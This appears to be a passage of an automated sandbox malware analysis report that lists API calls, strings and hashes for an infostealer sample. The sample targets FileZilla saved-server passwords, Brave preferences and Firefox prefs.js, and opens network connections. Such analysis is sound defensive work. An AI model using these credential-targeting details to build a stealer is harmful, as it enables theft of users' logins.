                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443E43
                            • lstrlen.KERNEL32(00461794), ref: 00443E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443E77
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443F0D
                            • lstrlen.KERNEL32(00461794), ref: 00443F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443F41
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443F75
                            • lstrlen.KERNEL32(?), ref: 00443F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 00443FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443FE0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044401F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0044402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004440CE
                            • lstrcat.KERNEL32(00000000), ref: 004440DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 004442D9
                            • FindClose.KERNEL32(00000000), ref: 004442E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: aff4fb7cb23aa9ec641a734730bd7271d65ee18f3d1a49391ec9b6c31bda16a7
                            • Instruction ID: 1aa0188be96b6cd6bf9ead208c40a035fef9e3ed7d81309276bdc25f90fe3eea
                            • Opcode Fuzzy Hash: aff4fb7cb23aa9ec641a734730bd7271d65ee18f3d1a49391ec9b6c31bda16a7
                            • Instruction Fuzzy Hash: BA62D371A116169BDB21EF75CD48BAFB7BAAF44705F04512AF801A3350DBB8DD01CBA8
                            Function 00446960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004469C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00446A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00446A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00446AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00446B35
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446B9D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 0ea40be201f0c23df33a792ddaf31f647ef3270beb5ce9074c408de16d25bd9c
                            • Instruction ID: fe50eeffb96fef8eeef6ad944ea7ae41dbd7207c19928ca7ffc22653682e3dcb
                            • Opcode Fuzzy Hash: 0ea40be201f0c23df33a792ddaf31f647ef3270beb5ce9074c408de16d25bd9c
                            • Instruction Fuzzy Hash: 6E42D371A00305AFDB11ABB1CD89BAFB7BAAF05704F15641AF801E7251DBB8DD018B69
                            Function 0043DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DBEF
                            • lstrlen.KERNEL32(00464CA8), ref: 0043DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC17
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 0043DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC4C
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DC8F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0043DCD0
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0043DCF0
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0043DD0A
                            • lstrlen.KERNEL32(0045CFEC), ref: 0043DD1D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DD7B
                            • lstrlen.KERNEL32(00461794), ref: 0043DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDA3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DDAF
                            • lstrlen.KERNEL32(?), ref: 0043DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 0043DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DE19
                            • lstrlen.KERNEL32(00461794), ref: 0043DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DE6F
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DE7B
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DEBB
                            • lstrlen.KERNEL32(00461794), ref: 0043DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DEE6
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DEF2
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFA5
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DFB1
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DFF4
                            • lstrlen.KERNEL32(00461794), ref: 0043DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E022
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043E02E
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 0043E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0043E0E7
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E11F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E155
                            • lstrcat.KERNEL32(00000000,?), ref: 0043E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E19F
                            • lstrcat.KERNEL32(00000000), ref: 0043E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E1F9
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E22F
                            • lstrlen.KERNEL32(00FF91A0), ref: 0043E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E261
                            • lstrcat.KERNEL32(00000000,00FF91A0), ref: 0043E269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0043E988
                            • FindClose.KERNEL32(00000000), ref: 0043E997
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 705b1e4a5929bc6d093db0111ed2546987cbd3ecb272ad8d92447c651e76d01e
                            • Instruction ID: ddb2c6715082b103938203766d0afaa719c3a08e66ce5b20de1fde0dd892984d
                            • Opcode Fuzzy Hash: 705b1e4a5929bc6d093db0111ed2546987cbd3ecb272ad8d92447c651e76d01e
                            • Instruction Fuzzy Hash: B8529071A113069FCB21EF75DD89AAF77B9AF08304F14612AF84597351DBB8DC018BA8
                            Function 004360D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 004360FF
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436152
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436185
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004361B5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004361F0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00436233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 557752db0af80c2e3febffaeb078440f63e9262c626af2039cc9a25cb61d412c
                            • Instruction ID: 6f4effe6f18e19869b35e31ffdb477d6bc3940163f57fcab66d55546ca231b49
                            • Opcode Fuzzy Hash: 557752db0af80c2e3febffaeb078440f63e9262c626af2039cc9a25cb61d412c
                            • Instruction Fuzzy Hash: F9527071A10216AFCB21EFB5DC45B9F77B9AF48304F15A12AF805A7251DB78DC01CBA8
                            Function 00446B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446B9D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446BCD
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446BFD
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00446C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00446C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00446C5A
                            • lstrlen.KERNEL32(00000000), ref: 00446C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00446CE2
                            • lstrlen.KERNEL32(00000000), ref: 00446CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00446D6A
                            • lstrlen.KERNEL32(00000000), ref: 00446D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00446DF2
                            • lstrlen.KERNEL32(00000000), ref: 00446E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00446E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00446EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00446EC9
                            • LocalFree.KERNEL32(00000000), ref: 00446ED4
                            • lstrlen.KERNEL32(?), ref: 00446F6E
                            • lstrlen.KERNEL32(?), ref: 00446F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: a722c3f32dd671ac02bdadf523a2895b9ee001db9f23f3024d68664e54ff42db
                            • Instruction ID: 2d8022eb2613e80a387570e111a6c21e5e68febaa690fc4b5d6ca04d2b3ecfa6
                            • Opcode Fuzzy Hash: a722c3f32dd671ac02bdadf523a2895b9ee001db9f23f3024d68664e54ff42db
                            • Instruction Fuzzy Hash: A502B171A00315AFDB10ABB1CD89B9F7BBAAF09704F15241AF801E7351DBB8DD018B69
                            Function 00444B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444B7F
                            • lstrlen.KERNEL32(00464CA8), ref: 00444B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BA7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 00444BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00444BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: 40cbbb5afb9aa5a9c8d4086e0a33c60e70a6b1d2f1f8c5a95737d82124e329cb
                            • Instruction ID: 25fc98698e3990b1dd425a69329ce69ae00916bf8ae978ee05b17d0be8d24ea5
                            • Opcode Fuzzy Hash: 40cbbb5afb9aa5a9c8d4086e0a33c60e70a6b1d2f1f8c5a95737d82124e329cb
                            • Instruction Fuzzy Hash: 35924F70A01601CFEF24DF29C948B6AB7E5AF45314F2980AEE8099B3A2D779DC41CB54
                            Function 00441250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00441291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004412BF
                            • lstrlen.KERNEL32(00464CA8), ref: 004412CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412E7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 004412F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0044133A
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044135C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00441376
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004413AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 004413D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004413E2
                            • lstrlen.KERNEL32(00461794), ref: 004413ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044140A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441416
                            • lstrlen.KERNEL32(?), ref: 00441423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441443
                            • lstrcat.KERNEL32(00000000,?), ref: 00441451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044147A
                            • StrCmpCA.SHLWAPI(?,00FFDDB0), ref: 004414A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 004414E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441535
                            • StrCmpCA.SHLWAPI(?,00FFE390), ref: 00441552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441593
                            • lstrcpy.KERNEL32(00000000,?), ref: 004415BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004415E4
                            • StrCmpCA.SHLWAPI(?,00FFDD38), ref: 00441602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441633
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441685
                            • StrCmpCA.SHLWAPI(?,00FFDE10), ref: 004416B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 004416F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441745
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004417BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 004417F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044181C
                            • FindClose.KERNEL32(00000000), ref: 0044182B
                            Memory Dump Source
